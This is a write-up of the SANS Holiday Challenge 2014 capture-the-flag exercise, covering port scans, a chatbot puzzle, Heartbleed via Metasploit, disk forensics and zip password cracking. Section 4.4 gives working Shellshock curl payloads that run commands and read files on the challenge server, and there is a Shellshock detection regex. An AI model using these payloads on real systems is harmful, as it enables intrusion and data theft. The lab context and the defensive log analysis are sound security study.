SANS Holiday Challenge 2014 A Christmas Hacking Carol
James Herubin - January 4, 2015
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN, page 1
1. Introduction 3
1.1: Setup 3
1.2: Tool Details 3
2. BLUF (Bottom Line Up Front) - Secrets Revealed 4
2.1: System at 173.255.233.59 4
2.2: Website 4
2.3: USB File System Image 4
2.4: Order of Completion 5
3. Ghost of Hacking Past 6
3.1: Nmap Scans 6
3.2: Telnet Sessions with Eliza 8
3.3: Response Discovery 8
3.4: Eliza’s Secret 10
4. Ghost of Hacking Present 13
4.1: Vulnerability Scan 13
4.2: Website Secret #1 14
4.3: Shellshock…maybe? 15
4.4: Website Secret #2 16
4.5: Strange Behavior 17
5. Ghost of Hacking Future 19
5.1: Preparation 19
5.2: USB Secret #1 21
5.3: USB Secret #2 22
5.4: USB Secret #3 23
5.5: USB Secret #4 26
6. Summary 29
Appendix A: Eliza Log File 30
Appendix B: Website Secret #2 - Metasploit Output 35
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �2
1. Introduction
1.1: Setup
After reading through the challenge and taking a look at what was presented I set up my Macbook Air with VMs of Kali Linux and the SANS Investigative Forensic Toolkit (SIFT) Workstation.
1.2: Tool Details
A list of the tools that were used to complete the challenge is shown here.
Macbook Air
• VMware Fusion - For running Linux distributions.
• Evernote - For keeping track of the copious notes throughout the challenge.
• Wireshark - For traffic and pcap analysis.
• python - Scripts and SimpleHTTPServer.
Kali Linux 1.09a
• Metasploit - Pen testing.
• OpenVAS - Vulnerability scanner.
• fcrackzip - Zip file password cracker.
• exiftool - For reading file metadata.
• cURL - For retrieving information from the web server.
SANS Investigative Forensic Toolkit (SIFT) Workstation Version 3.0
• srch_strings - General use string searching.
• log2timeline - Filesystem timeline analysis.
• l2t_process - Timeline sorting.
• blkls - For extraction of unallocated disk space and slack space.
• foremost - File carving utility.
• bulk_extractor - Extracting useful info from the disk image.
2. BLUF (Bottom Line Up Front) - Secrets Revealed
Before diving into the details of how I found the answers, here is a list of the questions asked during the challenge along with the secrets that were found.
2.1: System at 173.255.233.59
What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?
• Eliza Secret: “Machines take me by surprise with great frequency. -Alan Turing”
2.2: Website
What two secrets did the Ghost of Hacking Present deposit on the http://www.scrooge-and-marley.com website?
• Website Secret #1: Hacking can be noble.
• Website Secret #2: Use your skills for good.
2.3: USB File System Image
What four secrets are found on the USB file system image bestowed by the Ghost of Hacking Future?
• USB Secret #1: Your demise is a source of mirth.
• USB Secret #2: Your demise is a source of relief.
• USB Secret #3: Your demise is a source of gain for others.
• USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.
2.4: Order of Completion
It should be noted that I am writing this report in the order that the challenge was presented. However, my actual completion was not a linear process. The order of completion was:
• USB Secret #1
• USB Secret #2
• USB Secret #4
• Website Secret #1
• USB Secret #3
• Website Secret #2
• Eliza Secret
3. Ghost of Hacking Past
3.1: Nmap Scans
The first scan I ran was a full TCP scan which produced the following results.

root@kali:~# nmap -p- -sS 173.255.233.59

Starting Nmap 6.40 ( http://nmap.org ) at 2015-01-02 23:13 EST
Nmap scan report for li243-59.members.linode.com (173.255.233.59)
Host is up (0.024s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
25/tcp    filtered smtp
31124/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 39.38 seconds

The next scan was a UDP scan.

root@kali:~# nmap -sU -p- 173.255.233.59

Starting Nmap 6.40 ( http://nmap.org ) at 2014-12-26 23:28 EST
Nmap scan report for li243-59.members.linode.com (173.255.233.59)
Host is up (0.00031s latency).
Not shown: 65534 open|filtered ports
PORT    STATE SERVICE
123/udp open  ntp

Nmap done: 1 IP address (1 host up) scanned in 158.56 seconds

We see something that might need further investigation on TCP port 31124. Before doing so I ran a service version scan that reveals we have a very chatty service on TCP port 31124 and her name is Eliza.

root@kali:~# nmap -p- -sV 173.255.233.59

Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-26 23:37 EST
Nmap scan report for li243-59.members.linode.com (173.255.233.59)
Host is up (0.021s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
25/tcp    filtered smtp
31124/tcp open     unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port31124-TCP:V=6.40%I=7%D=1/2%Time=54A76CCC%P=x86_64-unknown-linux-gnu
SF:%r(NULL,24,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>
SF:\x20")%r(GenericLines,26,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOU
SF:R\x20MIND\?\n>\x20>\x20")%r(GetRequest,3A,"I\x20AM\x20ELIZA\.\x20\x20WH
SF:AT'S\x20ON\x20YOUR\x20MIND\?\n>\x20ARE\x20YOU\x20DISCHUFFED\?\n>\x20")%
SF:r(HTTPOptions,36,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIN
SF:D\?\n>\x20PLEASE\x20CONTINUE\n>\x20")%r(RTSPRequest,4B,"I\x20AM\x20ELIZ
SF:A\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20I\x20AM\x20NOT\x20SURE\
SF:x20I\x20UNDERSTAND\x20YOU\x20FULLY\n>\x20")%r(RPCCheck,3A,"I\x20AM\x20E
SF:LIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20ARE\x20YOU\x20DISCHU
SF:FFED\?\n>\x20")%r(DNSVersionBindReq,3A,"I\x20AM\x20ELIZA\.\x20\x20WHAT'
SF:S\x20ON\x20YOUR\x20MIND\?\n>\x20ARE\x20YOU\x20DISCHUFFED\?\n>\x20")%r(D
SF:NSStatusRequest,26,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20M
SF:IND\?\n>\x20>\x20")%r(Help,36,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x
SF:20YOUR\x20MIND\?\n>\x20PLEASE\x20CONTINUE\n>\x20")%r(SSLSessionReq,47,"
SF:I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20YOU'RE\x
SF:20BEING\x20A\x20BIT\x20WOOLY\x20WITH\x20ME\n>\x20")%r(Kerberos,3B,"I\x2
SF:0AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20BASH\x20ON\x
SF:20WITH\x20IT\x20THEN\n>\x20")%r(SMBProgNeg,52,"I\x20AM\x20ELIZA\.\x20\x
SF:20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20HAVE\x20OTHER\x20PEOPLE\x20SAID\
SF:x20THAT\x20YOU\x20ARE\x20STODGY\?\n>\x20")%r(X11Probe,3A,"I\x20AM\x20EL
SF:IZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20ARE\x20YOU\x20DISCHUF
SF:FED\?\n>\x20")%r(FourOhFourRequest,40,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S
SF:\x20ON\x20YOUR\x20MIND\?\n>\x20THAT\x20SOUNDS\x20LIKE\x20A\x20DODDLE\n>
SF:\x20")%r(LPDString,3B,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x
SF:20MIND\?\n>\x20BASH\x20ON\x20WITH\x20IT\x20THEN\n>\x20")%r(LDAPBindReq,
SF:59,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20I\x2
SF:0DON'T\x20MEAN\x20TO\x20RUSH\x20YOU,\x20BUT\x20COULD\x20YOU\x20CHIVVY\x
SF:20ON\?\n>\x20")%r(SIPOptions,45,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON
SF:\x20YOUR\x20MIND\?\n>\x20WHAT\x20DOES\x20THAT\x20SUGGEST\x20TO\x20YOU\?
SF:\n>\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 231.88 seconds
3.2: Telnet Sessions with Eliza
When you connect to Eliza through netcat or telnet on port 31124 she will respond to questions you ask. It becomes obvious that there are basic random responses and other responses that correspond to key words she is picking up. One example is the word “secret” as seen here.
3.3: Response Discovery
Interacting with Eliza was a slow and tedious process and I wanted to discover additional responses that I may not have encountered. I had a wordlist file that I created to discover USB Secret #3 so I wrote a little python script that would throw that list at Eliza and keep track of her unique responses.
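The script itself did not make it into the report, so here is an added example of the same idea that is my own code, not the author's. It keeps one TCP session open, sends each word from a list, and logs a (word, reply) pair only the first time a reply is seen. The protocol assumption (one reply line followed by the prompt "> ") is taken from the nmap fingerprint above; the MockEliza class and the host placeholder are constructed so the example runs offline.

```python
"""Wordlist-driven response discovery for a line-oriented chat service.

Added example, not the author's script. Assumed (hypothetical) protocol: the
service prints a greeting, then answers every line we send with one line
followed by the prompt "> ". Host/port are placeholders."""
import socket
from typing import Callable, Iterable, List, Set, Tuple

PROMPT = "> "


def parse_reply(raw: str) -> str:
    """Strip the trailing prompt and surrounding whitespace from one raw reply."""
    text = raw.rstrip()
    if text.endswith(PROMPT.strip()):
        text = text[:-len(PROMPT.strip())].rstrip()
    return text


def collect_unique(words: Iterable[str], ask: Callable[[str], str]) -> List[Tuple[str, str]]:
    """Send each word through ask() and log (word, reply) only for replies never seen before.

    The transport is abstracted behind ask(), so the same loop runs against a real
    socket (TcpChat) or the offline stand-in (MockEliza) below."""
    seen: Set[str] = set()
    log: List[Tuple[str, str]] = []
    for word in words:
        reply = parse_reply(ask(word))
        if reply and reply not in seen:
            seen.add(reply)
            log.append((word, reply))
    return log


class TcpChat:
    """One persistent TCP session; each call sends a line and reads up to the next prompt."""

    def __init__(self, host: str, port: int, timeout: float = 5.0) -> None:
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.greeting = self._recv_until_prompt()

    def _recv_until_prompt(self) -> str:
        buf = b""
        while not buf.decode("utf-8", errors="replace").endswith(PROMPT):
            chunk = self.sock.recv(4096)
            if not chunk:          # peer closed the connection
                break
            buf += chunk
        return buf.decode("utf-8", errors="replace")

    def __call__(self, word: str) -> str:
        self.sock.sendall((word + "\n").encode("utf-8"))
        return self._recv_until_prompt()


class MockEliza:
    """Constructed stand-in so the example runs offline. Keyword replies progress on
    repeated use, mirroring what the report observed for the word "link"; any other
    input cycles through generic replies."""

    GENERIC = ["PLEASE CONTINUE", "GO ON", "WHAT DOES THAT SUGGEST TO YOU?"]
    KEYWORD = {
        "link": [
            "I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.",
            "I LOVE CLICKING ON LINKS. DO YOU HAVE A LINK FOR ME?",
        ]
    }

    def __init__(self) -> None:
        self.turn = 0
        self.hits: dict = {}

    def __call__(self, word: str) -> str:
        self.turn += 1
        if word in self.KEYWORD:
            n = self.hits.get(word, 0)
            self.hits[word] = n + 1
            replies = self.KEYWORD[word]
            return replies[min(n, len(replies) - 1)] + "\n" + PROMPT
        return self.GENERIC[self.turn % len(self.GENERIC)] + "\n" + PROMPT


def demo() -> List[Tuple[str, str]]:
    """Run a small constructed wordlist against the mock and return the unique-reply log."""
    words = ["doctype", "html", "link", "public", "link", "link"]
    return collect_unique(words, MockEliza())


if __name__ == "__main__":
    # Live use would be: collect_unique(open("wordlist.txt").read().split(),
    #                                   TcpChat("HOST-PLACEHOLDER", 31124))
    for word, reply in demo():
        print(f"> {word}\n{reply}")
```

Keeping a single session open matters: the "link" and "challenge" responses progress with repeated use within one conversation, so reconnecting per word would hide them.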
This method allowed me to send over 7000 words to Eliza in under 5 minutes. You can see the log file of this interaction in Appendix A.
Some key revelations after this was complete include:
• Non-standard (or less random) responses to some words like: challenge, link and turing.
• Some responses ‘progressed’ if the word was used multiple times. One example is the word “link” which had these responses:
  • I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.
  • I LOVE CLICKING ON LINKS. DO YOU HAVE A LINK FOR ME?
  • YOU SEEM LIKE A NICE PERSON. I THINK I CAN TRUST THE LINKS YOU SEND ME.
• The word “challenge” also revealed this:
  • I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG. I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU. NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?
I then spent a loooooooooong time trying to send Eliza links in hopes of generating a desired response. Eventually I found that by repeating (six times) the “SURF TO” phrase found in the response above along with a valid URL Eliza would connect to the site.
3.4: Eliza’s Secret
Since Eliza was connecting to links I sent to her I needed to send her a link that would allow her to connect back to my network. This would allow me to see what kind of traffic she was generating. I already had a dynamic DNS service for my home network so I just forwarded TCP port 80 to port 8000 on my Macbook.
I started up an instance of SimpleHTTPServer on port 8000.
Started up Wireshark and filtered on Eliza’s IP address.
I then told her to surf to my address.
In Wireshark we can see my request to Eliza.
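The report used SimpleHTTPServer plus Wireshark to see what Eliza sent. As an added example (my own code, not the author's setup), the stand-in below answers any GET and records the method, path, client address and every request header, so the callback can be read without a capture file. The loopback address, the port selection and the visitor request in demo() are constructed; header names are lowercased by this code.

```python
"""Minimal HTTP request logger: records every header an inbound request carries.

Added example, not the author's setup. The port, paths and the client request
in demo() are constructed so the round trip runs offline on loopback."""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List, Tuple

CAPTURED: List[Dict[str, str]] = []   # one record per request, newest last


class LoggingHandler(BaseHTTPRequestHandler):
    """Serve a tiny page to any GET and keep method, path, client IP and all headers."""

    def do_GET(self) -> None:
        record = {"method": self.command, "path": self.path, "client": self.client_address[0]}
        record.update({name.lower(): value for name, value in self.headers.items()})
        CAPTURED.append(record)
        body = b"<html><body>thanks for visiting</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt: str, *args) -> None:
        pass   # keep stderr quiet; CAPTURED is the log


def serve_one(host: str = "127.0.0.1", port: int = 0) -> Tuple[HTTPServer, threading.Thread]:
    """Bind (port 0 picks a free port) and handle exactly one request on a background thread."""
    server = HTTPServer((host, port), LoggingHandler)
    worker = threading.Thread(target=server.handle_request, daemon=True)
    worker.start()
    return server, worker


def demo() -> Dict[str, str]:
    """Constructed round trip: play the remote visitor ourselves with a telltale User-Agent."""
    server, worker = serve_one()
    port = server.server_address[1]
    req = urllib.request.Request(
        f"http://127.0.0.1:{port}/landing.html",
        headers={"User-Agent": "EXAMPLE-VISITOR/1.0 (constructed)"},
    )
    with urllib.request.urlopen(req, timeout=5) as resp:
        resp.read()
    worker.join(5)
    server.server_close()
    return CAPTURED[-1]


if __name__ == "__main__":
    # For a real callback: server, worker = serve_one("0.0.0.0", 8000); worker.join()
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Whatever a remote client puts in the request line or headers ends up in the record, which is the quickest way to check what a bot-like visitor identifies itself as.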
4. Ghost of Hacking Present
4.1: Vulnerability Scan
The first thing I did for the website was run a vulnerability scan using OpenVAS from Kali. You do this by selecting: Applications —> Kali Linux —> Vulnerability Analysis —> OpenVAS —> openvas start
After the scan was complete the report revealed that this server has a couple of high-severity vulnerabilities.
A closer look indicated that the server is susceptible to the Heartbleed vulnerability.
4.2: Website Secret #1
I then turned to Metasploit to see if we can explore this a bit further.
In Kali you can start Metasploit from the command line by entering msfconsole or from the menu using Applications —> Kali Linux —> Exploitation Tools —> Metasploit —> metasploit framework
Do a search for heartbleed.

msf > search heartbleed

We see two results.
We can see the description of the first module by entering:

msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > info
Let’s give it a try. Set the web server’s IP address and run the exploit.

msf auxiliary(openssl_heartbleed) > set RHOSTS 23.239.15.124
RHOSTS => 23.239.15.124
msf auxiliary(openssl_heartbleed) > run

Here is a snippet of the Metasploit output revealing Website Secret #1. See Appendix B for the full output.
We can pretty much read the secret in that output but let’s run it through a URL decoder.
4.3: Shellshock…maybe?
For the next secret I decided to go with what I knew about the site pages and also play off a hint that the Ghost of Hacking Present provided.
Looking at the source code of the contact.html web page we can see that there is a submit.sh file in the cgi-bin folder.
The Ghost also told us that “Those secrets should shock your heart, teaching you important lessons for all time.” We already found the heartbleed so now let’s go after shellshock.
4.4: Website Secret #2
Using curl I started with the following command.

root@kali:~# curl http://23.239.15.124/cgi-bin/submit.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; pwd"
/var/www/cgi-bin
Content-Type: text/html

<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>

Interesting…if you notice, the first line in the output tells us we are in the /var/www/cgi-bin directory. Let’s see if we can traverse directories.

root@kali:~# curl http://23.239.15.124/cgi-bin/submit.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; cd ../../../etc/.. ; pwd"
/
Content-Type: text/html

<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>

Good. It looks like we are at the root of the filesystem. Let’s see if we can list out the contents of that directory.

root@kali:~# curl http://23.239.15.124/cgi-bin/submit.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; echo /*"
/bin /dev /etc /lib /lib64 /run /sbin /secret /selinux /usr /var
Content-Type: text/html

<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>
We can now see that we have something called /secret in the root directory. After trying to cd into that directory failed I suspected that this may be a file. I quickly realized that simple commands like ls did not work with this type of vulnerability. Instead you must use bash builtin commands. One of these commands is “read”, and you have the option to get a single line using the -r switch. After fumbling through the syntax I finally got this to work and found Website Secret #2.

root@kali:~# curl -A '() { :; }; echo; read -r line </secret; echo $line' http://23.239.15.124/cgi-bin/submit.sh
Website Secret #2: Use your skills for good.
Content-Type: text/html

<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>

4.5: Strange Behavior
I found one other bit of strange behavior on the server. By leaving the .sh off of the submit.sh filename you can navigate to http://www.scrooge-and-marley.com/cgi-bin/submit and see what looks like the possible contents of submit.sh. Maybe this is a backup copy of the file or a configuration problem?
I wanted to see if it was another file. I tried to use the method above to get the first line of the “submit” file and got no results.

root@kali:~/test# curl -A '() { :; }; echo; read -r line </var/www/cgi-bin/submit; echo $line' http://23.239.15.124/cgi-bin/submit.sh
<— No Info - submit not a file ???
Content-Type: text/html

<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>

Here the test does work against the known “submit.sh” file.

root@kali:~/test# curl -A '() { :; }; echo; read -r line </var/www/cgi-bin/submit.sh; echo $line' http://23.239.15.124/cgi-bin/submit.sh
#!/bin/bash <— Correct first line from submit.sh
Content-Type: text/html

<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>

With that said I am not sure what that behavior indicates.
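Every request in 4.4 and 4.5 carries the same Shellshock marker, a bash function definition "() {" placed in a header value. From the server side that marker is also the simplest thing to hunt for in the access logs, so here is an added detection example (my own code, not from the report) run over constructed Apache combined-format log lines.

```python
"""Detect Shellshock-style function definitions in web server access logs.

Added example (not from the report). The log lines are constructed in Apache
"combined" format; the marker "() {" is the same one the report's curl requests
carry in the User-Agent and custom headers."""
import re
from typing import Dict, Iterable, List

# A bash function export starts "() {". Allow stray whitespace, which scanners
# vary to slip past naive substring matches.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache combined log: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Constructed sample: two probes from one source address, one ordinary visit.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Dec/2014:23:41:12 -0500] "GET /cgi-bin/submit.sh HTTP/1.1" 200 184 "-" "() { :; }; echo constructed-probe"',
    '198.51.100.23 - - [26/Dec/2014:23:41:30 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (constructed)"',
    '203.0.113.7 - - [26/Dec/2014:23:42:02 -0500] "GET /cgi-bin/submit.sh HTTP/1.1" 200 184 "() {ignored;}; echo constructed-probe" "curl/7.38.0"',
]


def parse_combined(line: str) -> Dict[str, str]:
    """Return the named fields of one combined-format line, or {} if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else {}


def flag_shellshock(lines: Iterable[str]) -> List[Dict[str, str]]:
    """One finding per log line whose request, referer or user-agent carries the marker."""
    findings = []
    for line in lines:
        rec = parse_combined(line)
        if not rec:
            continue
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append({"ip": rec["ip"], "time": rec["time"],
                                 "field": field, "value": rec[field],
                                 "target": rec["request"]})
                break   # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in flag_shellshock(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['field']}: {f['value']!r} -> {f['target']}")
```

One caveat worth knowing as a defender: the combined format only records the Referer and User-Agent headers, so a payload in an arbitrary header (the "custom:" header used in 4.4) never reaches the access log. Catching that needs something that sees the full request, such as mod_security rules or a packet capture, and of course a patched bash on the server so the function import is never evaluated.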
5. Ghost of Hacking Future
5.1: Preparation
After downloading the USB image I started to set up my SIFT Workstation to begin analysis. I mounted the image read-only.

root@siftworkstation:~# mount -o loop,ro,show_sys_files,streams_interface=windows hhusb.dd.bin /mnt/windows_mount

…and then set up a work area under cases.
I started out with a basic string search against the image file.

root@siftworkstation:/home/sansforensics# srch_strings hhusb.dd.bin > srchstrings.txt

Using log2timeline and l2t_process I created a super timeline of the image.

root@siftworkstation:~# log2timeline -r -p -z EST5EDT /mnt/windows_mount -w timeline.csv
root@siftworkstation:~# l2t_process -b timeline.csv > super_timeline.csv

I then ran bulk_extractor to see if we get anything else of interest.

root@siftworkstation:~# bulk_extractor -e net -e aes -o /cases/HackingFuture/be/ hhusb.dd.bin

Finally, I used foremost and blkls from The Sleuth Kit to carve out anything that may be in unallocated space and slack space.

root@siftworkstation:~# blkls hhusb.dd.bin > /cases/HackingFuture/unallocated_imagefile.blkls
root@siftworkstation:~# blkls -s hhusb.dd.bin > /cases/HackingFuture/slack_imagefile.blkls
root@siftworkstation:~# mkdir /cases/HackingFuture/unallocated
root@siftworkstation:~# foremost -o /cases/HackingFuture/ /cases/HackingFuture/unallocated/unallocated_imagefile.blkls
root@siftworkstation:~# foremost -o /cases/HackingFuture/unallocated /cases/HackingFuture/unallocated_imagefile.blkls
root@siftworkstation:~# mkdir /cases/HackingFuture/slack
root@siftworkstation:~# foremost -o /cases/HackingFuture/slack /cases/HackingFuture/slack_imagefile.blkls

When all that is complete I end up with a browsable mount point of the original USB image…
…and some other potentially interesting stuff.
5.2: USB Secret #1
In the srch_strings output file I looked for the word “secret”. Bingo…there is USB Secret #1.
I wanted to find the actual location of this secret. The context around the srch_strings results indicates it may be in a Word document. At the root of the mount point of the USB image there is a Word document named LetterFromJackToChuck.doc. If we look at the properties of the document we can find the following in the Custom Properties tab.
5.3: USB Secret #2
Another thing I like to do with string searches is to look for things like Base64 encoding. Although a Base64 encoded string does not always end in “=” or “==”, I still like to look for those endings to see if I get lucky. A search for “==” in the srch_strings output file revealed the following.
Running that through a Base64 decoder reveals USB Secret #2.
Once again I wanted to find the actual location of this secret. The context around this one indicated that it was part of a captured chat conversation so I took a look at the pcap file named h2014-chat.pcapng. I opened the file in Wireshark and looked for the string “I so love you”. The packet that contained this string has a comment annotated that contains the Base64 encoded string.
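Grepping for "==" only catches encoded data whose length happens to need two padding characters. As an added example (my own code, not the report's), the scanner below goes a step further than the page's search: it pulls every long Base64-alphabet token out of strings output, rejects tokens whose length is not a multiple of four, and keeps only those that decode to printable text, which filters out hex digests and filenames that merely look like Base64. The sample lines are constructed; the encoded chat line is built from a constructed plaintext.

```python
"""Find and decode Base64-looking tokens in strings output.

Added example, not the report's method verbatim: the report grepped for "==";
this scans every long Base64-alphabet token, rejects by length, and keeps only
candidates that decode to printable text. Sample lines are constructed."""
import base64
import re
import string
from typing import Iterable, List, Tuple

# 16+ chars of the Base64 alphabet, optional padding, not glued to more alphabet chars.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
PRINTABLE = set(string.printable)

SAMPLE_PLAIN = "constructed sample: I so love you, my secret is safe"
SAMPLE_LINES = [
    "LetterFromJackToChuck.doc",                 # 21 alphabet chars, but length % 4 != 0
    "0123456789abcdef0123456789abcdef",          # hex digest: decodes, but to binary junk
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",          # decodes to NUL bytes
    "[chat] mark: " + base64.b64encode(SAMPLE_PLAIN.encode()).decode(),
    "short dGVzdA==",                            # below the 16-char floor
]


def looks_like_text(data: bytes, threshold: float = 0.95) -> bool:
    """True when at least `threshold` of the decoded bytes are printable ASCII."""
    if not data:
        return False
    text = data.decode("ascii", errors="replace")
    return sum(ch in PRINTABLE for ch in text) / len(text) >= threshold


def find_base64_candidates(lines: Iterable[str],
                           require_padding: bool = False) -> List[Tuple[int, str, str]]:
    """Return (line_number, token, decoded_text) for each token that decodes to text.

    require_padding=True reproduces the report's narrower "ends in =" search."""
    found = []
    for lineno, line in enumerate(lines, 1):
        for m in B64_TOKEN.finditer(line):
            token = m.group(0)
            if require_padding and not token.endswith("="):
                continue
            if len(token) % 4:
                continue          # not a whole number of 4-char groups
            try:
                raw = base64.b64decode(token, validate=True)
            except ValueError:    # binascii.Error is a ValueError subclass
                continue
            if looks_like_text(raw):
                found.append((lineno, token, raw.decode("ascii")))
    return found


if __name__ == "__main__":
    # Live use: find_base64_candidates(open("srchstrings.txt", errors="replace"))
    for lineno, token, text in find_base64_candidates(SAMPLE_LINES):
        print(f"line {lineno}: {token} -> {text!r}")
```

The printable-text filter is what keeps the output short on a real strings dump, where hashes and long identifiers match the Base64 alphabet constantly but never decode to anything readable.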
5.4: USB Secret #3
Foremost carved out a .zip file from the image. When I tried to access the contents I was prompted for a password.
I then tried brute forcing the password using fcrackzip. After letting that run for most of the day I realized that there had to be a better way. I went out on a limb looking for clues in the challenge site as well as the Scrooge and Marley site. I wrote a small python script to extract all the words in the source code of these two sites.
I then took that wordlist and used it to find the password with fcrackzip. Success…password is “shambolic”.
That password was found on the Scrooge and Marley site in a comment near the top of the file.
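The wordlist script is not reproduced in the report, so here is an added example of the same approach, my own code rather than the author's. It tokenises the raw page source (tags, attributes and, importantly, HTML comments) into an ordered wordlist, and adds a standard-library password test against a ZipCrypto archive as the step fcrackzip performed. The sample page, its comment and the URL placeholder are constructed.

```python
"""Build a password wordlist from web page source and test it against a zip.

Added example, not the author's script. Tokenising the raw source (tags,
attributes and comments included) is deliberate: the report found the password
in an HTML comment. The sample page below is constructed; fetch_source() is
only used against live URLs."""
import re
import urllib.request
import zipfile
import zlib
from typing import Iterable, List, Optional

WORD_RE = re.compile(r"[A-Za-z0-9_]+")

SAMPLE_SOURCE = """<!DOCTYPE html>
<!-- constructed sample page; note to self: archive password is shambolic -->
<html><head><title>Scrooge &amp; Marley</title></head>
<body><p class="intro">Bah, humbug!</p></body></html>"""


def fetch_source(url: str, timeout: float = 10.0) -> str:
    """Download raw page source (not a parsed DOM, so comments survive)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_words(source: str, min_len: int = 1) -> List[str]:
    """Ordered, de-duplicated tokens from raw source; case is preserved."""
    seen = set()
    words: List[str] = []
    for word in WORD_RE.findall(source):
        if len(word) >= min_len and word not in seen:
            seen.add(word)
            words.append(word)
    return words


def try_zip_passwords(zip_path: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that fully decrypts the archive's first member.

    Reads the whole member so the CRC check catches the 1-in-256 false accepts of
    ZipCrypto's single check byte. Standard-library only, so far slower than
    fcrackzip; fine for a wordlist of a few thousand entries."""
    with zipfile.ZipFile(zip_path) as zf:
        member = zf.namelist()[0]
        for pw in candidates:
            try:
                with zf.open(member, pwd=pw.encode("utf-8")) as fh:
                    fh.read()
                return pw
            except (RuntimeError, zipfile.BadZipFile, zlib.error):
                continue
    return None


if __name__ == "__main__":
    words = extract_words(SAMPLE_SOURCE)
    print(f"{len(words)} unique words; first few: {words[:8]}")
    # Live use: words = extract_words(fetch_source("http://URL-PLACEHOLDER/"))
    #           print(try_zip_passwords("carved.zip", words))
```

Keeping case and single-character tokens makes the list longer, but a site-specific list of a few thousand words is still tiny next to a brute-force run, which is the whole point of the approach.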
Inside the .zip file was this image named Bed_Curtains.png.
I ran exiftool on this image to reveal USB Secret #3.
5.5: USB Secret #4
While looking at the super timeline that was created we see that there was a deleted file named Tiny_Tom_Crutches_Final.jpg.
In our preparation for this portion of the challenge foremost recovered this image from unallocated space. The full size version of the image is used on the cover page of this report.
